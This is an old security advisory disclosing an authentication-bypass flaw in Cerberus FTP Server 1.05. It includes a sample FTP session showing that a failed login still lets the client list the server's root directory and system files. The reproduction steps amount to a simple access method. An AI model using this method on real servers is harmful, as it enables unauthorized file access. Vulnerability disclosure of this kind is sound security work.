Andrisk Security Advisory 2# - Cerberus FTP Server 1.05 for Windows 9x/NT allows remote users without accounts to view any file on the server.
ac36f5c4f40ea379968ee64d982cb79cad04d53d8808bf71cd2833ea937ccc41
Andrisk Security Advisory 2# - Cerberus FTP Server 1.05
Topic: Cerberus FTP Server 1.05
Announced: 2001-04-25
Affects: Cerberus FTP Server 1.05
OS : Win9x/NT
I. Problem Description
**********************
Cerberus FTP Server 1.05 is an FTP server for Windows 9x/NT. A bug
allows view any files from remote computer.
II. Impact
**************
When any user try to login with username that is not specified (or wrong) ftp server alowes :
1. Remote client stay conected
2 .Remote client can view all files and browse directories of the remote computer
Example 1:
--------
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Name (IP:root): aaaaaaaaa
530 Unknown user
ftp: Login failed.
Remote system type is WindowsNT.
ftp> ls
200 Port command received
150 Opening data connection
d---rwxrwx 1 100 84 0 Apr 29 2001 !!
----rwxrwx 1 100 84 0 Nov 22 2000 AUTOEXEC.BAT
-r--rwxrwx 1 100 84 289 Dec 25 2000 boot.ini
-r--rwxrwx 1 100 84 36 Nov 22 2000 CONFIG.SYS
-r--rwxrwx 1 100 84 4717 Jan 31 2001 ffastun.ffa
-r--rwxrwx 1 100 84 2113536 Jan 31 2001 ffastun.ffl
-r--rwxrwx 1 100 84 417792 Jan 31 2001 ffastun.ffo
-r--rwxrwx 1 100 84 3620864 Jan 31 2001 ffastun0.ffx
dr--rwxrwx 1 100 84 0 Apr 30 2001 ftproot
-r--rwxrwx 1 100 84 0 Oct 01 2000 IO.SYS
dr--rwxrwx 1 100 84 0 Apr 30 2001 mirc
-r--rwxrwx 1 100 84 0 Oct 01 2000 MSDOS.SYS
-r--rwxrwx 1 100 84 26816 Oct 01 2000 NTDETECT.COM
-r--rwxrwx 1 100 84 156496 Oct 01 2000 ntldr
-r--rwxrwx 1 100 84 579 Oct 28 2000 os240905.bin
-r--rwxrwx 1 100 84 578 Nov 16 2000 os560179.bin
-r--rwxrwx 1 100 84 163811328 Apr 27 2001 pagefile.sys
dr--rwxrwx 1 100 84 0 Apr 29 2001 Program Files
dr--rwxrwx 1 100 84 0 Apr 30 2001 rc5
dr--rwxrwx 1 100 84 0 Apr 19 2001 RECYCLER
dr--rwxrwx 1 100 84 0 Apr 30 2001 TEMP
dr--rwxrwx 1 100 84 0 Apr 29 2001 WINNT
-r--rwxrwx 1 100 84 1375 Apr 29 2001 winzip.log
226 Transfer complete
ftp>
III. Solution
*************
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>
Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p